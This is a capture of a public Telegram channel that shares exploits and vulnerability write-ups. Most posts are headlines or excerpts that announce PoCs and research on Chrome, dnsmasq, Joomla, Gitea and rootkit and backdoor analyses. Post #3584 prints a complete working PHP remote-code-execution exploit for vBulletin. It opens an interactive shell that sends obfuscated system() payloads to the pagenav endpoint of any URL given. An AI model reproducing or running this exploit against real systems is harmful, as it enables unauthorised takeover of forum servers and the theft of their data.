TGViewer
Channel Public Channel
Proxy Bar

Proxy Bar

@proxy_bar

Exploits, Hacking and Leaks

Чат группы - https://t.me/

Связь с администрацией и реклама:
@NULL_vm

Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Subscribers
21.4K
Photos
1.7K
Videos
107
Links
1.8K

Showing posts older than #3592 · Back to latest

Older Posts 20 shown
Post #3591 9.73K
MariaDB 13.0.1-rc RCE Lab
*
All in ONE
  • 👍 19
  • 🔥 10
  • 😱 8
Post #3590 7.85K
CVE-2026-58025 MediaWiki
*
The deserialization flaw could lead to RCE via malicious log imports.
*
PoC
  • 👍 8
  • 🔥 5
  • 😱 1
Post #3589 9.15K
CVE-2026-60004 Gitea RCE
(CVSS 9.8)
*
PoC
  • 👍 23
  • 🔥 6
  • 😱 2
Post #3588 8.56K
Longinus: Two Security Boundaries in One Bug — Piercing Chrome’s Renderer and the V8 Sandbox with CVE-2026-6307

Original text: “Longinus: 2 Boundaries in One Bug, Piercing Chrome’s Renderer and V8 Sandbox with a Single Vulnerability, CVE-2026-6307” — Nebula Security, NebuSec (June 29, 2026). Code, tables and figures below are reproduced verbatim with attribution captions.

Executive Summary

CVE-2026-6307 is a single V8 vulnerability that crosses two security boundaries at once. The root cause…

https://core-jmp.org/2026/07/cve-2026-6307-v8-framestate-type-confusion/
  • 🔥 5
Post #3587 7.53K
CVE-2026-66066 in Ruby on Rails
*
Storage file-read-to-RCE chain

*
PoC
  • 👍 6
  • 🔥 4
  • 😱 3
Post #3586 8.13K
CVE-2026-57827 — Joomla
*
Component Unauthenticated File Upload RCE
Split-Controller Upload Bypass → Direct Write Task → /downloads/shell.php → RCE

Exploit
  • 👍 10
  • 🔥 7
Post #3585 6.14K
SakDriver: Reversing a Windows Kernel Driver Rootkit

Original text: “SakDriver: Reversing a Kernel Driver Rootkit” — 0xSec, 0xsec.gitbook.io. Disassembly screenshots, the command-ID table, indicators of compromise and the YARA figure below are reproduced with attribution captions.

Executive Summary

What began as a routine look at a “Cobalt Strike Beacon” sample turned out to be something far more dangerous: a full Windows kernel-mode…

https://core-jmp.org/2026/07/sakdriver-reversing-kernel-driver-rootkit/
  • 👍 8
  • 🔥 3
Post #3584 7.16K
CVE-2026-61511 vBulletin
*
Affected Versions
vBulletin 6.2.1 and prior
vBulletin 6.1.6 and prior

*
Exploit
<?php

set_time_limit(0);
error_reporting(E_ERROR);

print "+-------------------------------------+\n";
print "| vBulletin 0-day RCE exploit by EgiX |\n";
print "+-------------------------------------+\n";

if (!extension_loaded("curl")) die("\n[+] cURL extension required!\n");

if ($argc != 2) {
print "\nUsage......: php $argv[0] <URL>\n";
print "\nExample....: php $argv[0] http://localhost/vb/";
print "\nExample....: php $argv[0] https://vbulletin.com/\n\n";
die();
}

function encodeChar($char)
{
$numbers = ['0' => '(O)', '1' => '(1)', '2' => '(2)', '3' => '(3)', '4' => '(4)', '5' => '(5)', '6' => '(6)', '7' => '(7)', '8' => '(8)', '9' => '(9)'];

$char = strval(ord($char));

$ret = '';
for ($i = 0; $i < strlen($char); $i++) $ret .= $numbers[$char[$i]] . '.';

return rtrim($ret, '.');
}

function makePayload($function, $param)
{
$chr_fun = '((((999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999).(9))^((2).(0).(4)))^((8).(6).(((9).(9))^((9).(9)))))';

$ret = '';
foreach (str_split($function) as $c) $ret .= $chr_fun . '(' . encodeChar($c) . ').';

$ret = "(" . rtrim($ret, '.') . ')((';

foreach (str_split($param) as $c) $ret .= $chr_fun . '(' . encodeChar($c) . ').';

return rtrim($ret, '.') . '))';
}

$curl = curl_init();
$params = ["routestring" => "ajax/render/pagenav"];

curl_setopt($curl, CURLOPT_URL, $argv[1]);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
//curl_setopt($curl, CURLOPT_PROXY, "http://127.0.0.1:8080");

while (1) {
print "\nvb-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
$cmd .= "; echo _____";
$params["pagenav[pagenumber]"] = makePayload("system", $cmd);
curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($params));
preg_match('/_____(.*)_____/s', curl_exec($curl), $m) ? print $m[1] : die("\n[+] Exploit failed! :(\n\n");
}
  • 🔥 12
  • 👍 11
Post #3583 6.59K
Exploiting HTTP Parser Inconsistencies: ACL Bypasses, SSRF, and Cache Poisoning

Original text: “Exploiting HTTP Parsers Inconsistencies” — Rafa, Rafa’s Security Researches (research conducted December 2021 – April 2022). Code blocks, tables and figures below are reproduced verbatim with attribution captions.

Executive Summary

HTTP is the connective tissue of the modern web, but the specification leaves enough ambiguity that no two parsers agree on every edge…

https://core-jmp.org/2026/07/exploiting-http-parser-inconsistencies/
  • 👍 7
  • 🔥 4
Post #3581 7.4K
Извините, но чет порвало 😆

#cinema #royal
  • 👍 24
  • 🔥 10
Post #3580 7.43K
NEUROMANCER
*
timeline:
Книгу Гибсон написал в 80х
Экранизировать пытались с 90х
Прочитал я ее где то в 2007.
Толпы фанатов, тонны ФанФиков, миллионы всякого арта и тд и пт, в итоге - невероятнейший долгострой.
В принципе можно было бы уже ИИ самим подключить, да и закрыть гештальт.
И тем не менее яблоко вываливает:
NEUROMANCER First Teaser

#cyberpunk
  • 🔥 22
  • 👍 4
  • 😱 1
Post #3578 8.54K
Dnsmasq DNS Remote Heap Buffer Overflow (CVE-2026-2291)

Original text: “Dnsmasq DNS Remote Heap Buffer Overflow” — David Barksdale, Exodus Intelligence (July 20, 2026). Code snippets, DNS responses, and exploitation details are reproduced verbatim with attribution.

Executive Summary

CVE-2026-2291 is a critical remote code execution vulnerability in dnsmasq, a widely deployed lightweight DNS and DHCP server used in embedded systems, routers, and Linux…

https://core-jmp.org/2026/07/dnsmasq-dns-remote-heap-buffer-overflow-cve-2026-2291/
  • 🔥 8
  • 😱 3
  • 👍 1
Post #3577 6.24K
Escalating All The Privileges With Foxit PDF Reader (CVE-2026-57239)

Original text: “Escalating All The Privileges With Foxit PDF Reader (CVE-2026–57239)” — Luke Paris, Paradoxis (July 15, 2026). Code snippets, technical analysis, and detection/mitigation guidance are reproduced verbatim with attribution.

Executive Summary

CVE-2026-57239 is a local privilege escalation vulnerability discovered in Foxit PDF Reader that allows an unprivileged user to escalate privileges to NT AUTHORITYSYSTEM…

https://core-jmp.org/2026/07/escalating-privileges-foxit-pdf-reader-cve-2026-57239/
  • 🔥 4
  • 😱 1
Post #3576 5.58K
KernelCallbackTable Process Injection

Original text: “KernelCallbackTable Process Injection” — S12, Medium (2026). Code blocks and technical implementation details are reproduced verbatim with attribution.

Executive Summary

Windows message handling is everywhere. Every GUI application sits in a message loop waiting for user input and window events. But what happens when an attacker corrupts the callback table that decides which…

https://core-jmp.org/2026/07/kernelcallbacktable-process-injection/
  • 🔥 3
Post #3575 4.76K
Breaking ONLYOFFICE in 3 steps: OnlyShells vulnerability chain

Original text: “Breaking ONLYOFFICE in 3 steps: OnlyShells vulnerability chain” — BI.ZONE Vulnerability Research team, BI.ZONE (July 21, 2026). Code, CVE metadata, figures and the demonstration video below are reproduced with attribution captions.

Executive Summary

OnlyShells is a chain of five vulnerabilities discovered in ONLYOFFICE Desktop Editors during a fall 2025 security assessment. Chained together,…

https://core-jmp.org/2026/07/onlyoffice-onlyshells-vulnerability-chain/
  • 🔥 6
  • 😱 3
  • 👍 2
Post #3574 4.94K
GDID: The Windows Global Device Identifier

Original text: “GDID: The Windows Global Device Identifier” — Smukx, ZeroTrace Lab (July 18, 2026). Code blocks, commands, tables, and technical specifications reproduced verbatim with attribution.

Executive Summary

Every Windows installation receives a unique 64-bit Global Device Identifier (GDID) that serves as Microsoft’s canonical device-level tracking mechanism. The GDID originates as a plaintext registry value…

https://core-jmp.org/2026/07/gdid-windows-global-device-identifier/
  • 🔥 4
Post #3573 5.03K
CVE-2026-49176 Exploit Development: WalletService to SYSTEM

Original text: “CVE-2026-49176 Exploit Development: WalletService to SYSTEM” — David Carliez, 17 July 2026. Code blocks, tables, and technical diagrams are reproduced verbatim with attribution.

Executive Summary

CVE-2026-49176 represents a critical local privilege-escalation vulnerability affecting Windows WalletService, a LocalSystem-hosted service that manages wallet operations through the public Windows.ApplicationModel.Wallet WinRT API. The vulnerability emerges from a…

https://core-jmp.org/2026/07/cve-2026-49176-walletservice-to-system/
  • 😱 3
  • 🔥 2
Post #3572 5.32K
[QuickNote] SolidPDFCreator – Mustang Panda Stage-1 Backdoor (Target India)

Original text: “[QuickNote] SolidPDFCreator – Mustang Panda Stage-1 Backdoor (Target India)” — AI, 0day in {REA_TEAM} (July 13, 2026). Code blocks, tables, diagrams, and technical artefacts are reproduced verbatim with attribution captions.

Executive Summary

SolidPDFCreator.dll is a sophisticated stage-1 backdoor loader disguised as a legitimate SolidPDF product, attributed to Mustang Panda and targeting India. The…

https://core-jmp.org/2026/07/solidpdfcreator-mustang-panda-stage-1-backdoor-india/
  • 🔥 3
  • 👍 2
Older posts →
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →